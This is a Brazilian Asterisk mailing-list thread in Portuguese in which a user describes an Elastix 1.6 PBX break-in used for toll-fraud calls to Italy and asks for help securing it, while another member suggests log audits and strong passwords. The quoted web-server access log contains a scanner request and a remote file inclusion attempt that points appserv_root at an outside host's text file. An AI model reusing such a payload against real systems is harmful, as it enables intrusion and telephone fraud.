[AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6
Gleidison Sampaio
gleidison.sampaio em hotmail.com
Segunda Novembro 22 15:23:47 BRST 2010
Nielsen,
Cara, rodei tudo quanto é coisa na maquina do cliente, essa parte foi facil, até porque só tem uma maquina em cada filial, nao detectei nada, até porque tem um firewall que barra tudo quanto é acesso, mais enfim o fato é que eu gostaria de saber, o que posso fazer pra tornar mais seguro pra evitar essas invasões.
Att;
Gleidison C. Sampaio
From: nielsen em freesolutions.com.br
Date: Mon, 22 Nov 2010 13:51:04 -0300
To: asteriskbrasil em listas.asteriskbrasil.org
Subject: Re: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6
Bom eles autenticaram numa boa ? Vc está utilizando senhas fortes ? provavelmente eles monitoraram seu server e conseguiram uma senha ... Muito estranho vc fez uma auditoria nos logs ? Pode ser que algum de seus clientes esteja com trojan, este enviou as informações e no meio delas foram os dados de autenticação.
Pensou nisso tudo ?
No final das contas é preciso a auditoria para identificar a origem da invasão.
Em 22 de novembro de 2010 13:40, Gleidison Sampaio <gleidison.sampaio em hotmail.com> escreveu:
Sim no Elastix 1.6
ele se encontra em um Co-location dentro da GVT em uma maquina virtual, com IP Publico e tenho ramais distribuidos em 5 filiais diferentes, esses ramais estao logados atraves de Linksys SPA2102 todos estes atras de Firewall, e o que notei no CDR foi que fizeram ligaçoes apenas um ramal, e em duas horas durante a madrugada os caras arrebentaram de ligar.
2010-11-21 21:14:01
XXXX00393396976261
SIP/TRUNK
SIP/TRUNKANSWERED
1045
Att;
Gleidison C. Sampaio
From: nielsen em freesolutions.com.br
Date: Mon, 22 Nov 2010 13:27:16 -0300
To: asteriskbrasil em listas.asteriskbrasil.org
Subject: Re: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6
Opa, foi no seu ELASTIX 1.6?
Qual a posição que se encontra seu servidor voip na sua rede ?
Em 22 de novembro de 2010 13:20, Gleidison Sampaio <gleidison.sampaio em hotmail.com> escreveu:
Sidinei,
Obrigado pela Resposta,
cara sofri uma invasao essa madrugada, e os caras arrebentaram de ligaçoes para a Italia, abaixo peguei o seguinte log. e os caras fizeram um rombo. alguem poderia me ajudar a bloquear isso.
/var/log/httpd/access_log
72.167.164.44 - - [20/Nov/2010:01:34:19 -0200] "GET /user/soapCaller.bs HTTP/1.1" 302 305 "-" "Morfeus Fucking Scanner"
72.167.164.44 - - [20/Nov/2010:02:01:53 -0200] "GET /appserv/main.php?appserv_root=http://88.255.225.20/appserv/t.txt? HTTP/1.1" 302 354 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
Att;
Gleidison C. Sampaio
From: sidnei_rp em ig.com.br
To: asteriskbrasil em listas.asteriskbrasil.org
Date: Mon, 22 Nov 2010 14:00:10 -0200
Subject: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6
Não, pois estão todas as linhas comentadas (é só um exemplo).
De: asteriskbrasil-bounces em listas.asteriskbrasil.org [mailto:asteriskbrasil-bounces em listas.asteriskbrasil.org] Em nome de Gleidison Sampaio
Enviada em: segunda-feira, 22 de novembro de 2010 13:40
Para: Asterisk Lista
Assunto: [AsteriskBrasil] Duvida ( SEGURANÇA ) Elastix 1.6
Boa tarde Lista!
hoje fuçando nas configuraçoes do meu PBX eu abri a seguinte configuraçao, e gostaria de saber se isso da permissao a algum acesso no meu servidor
/etc/asterisk/users.conf
;[6000]
;fullname = Joe User
;email = joe em foo.bar
;secret = xxxx
;zapchan = 1
;hasvoicemail = yes
;vmsecret = xxxx
;hassip = yes
;hasiax = no
;hash323 = no
;hasmanager = no
;callwaiting = no
;context = international
Att;
Gleidison C. Sampaio
-------------- Próxima Parte ----------
Um anexo em HTML foi limpo...
URL: http://listas.asteriskbrasil.org/pipermail/asteriskbrasil/attachments/20101122/4001975b/attachment-0001.htm
Mais detalhes sobre a lista de discussão AsteriskBrasil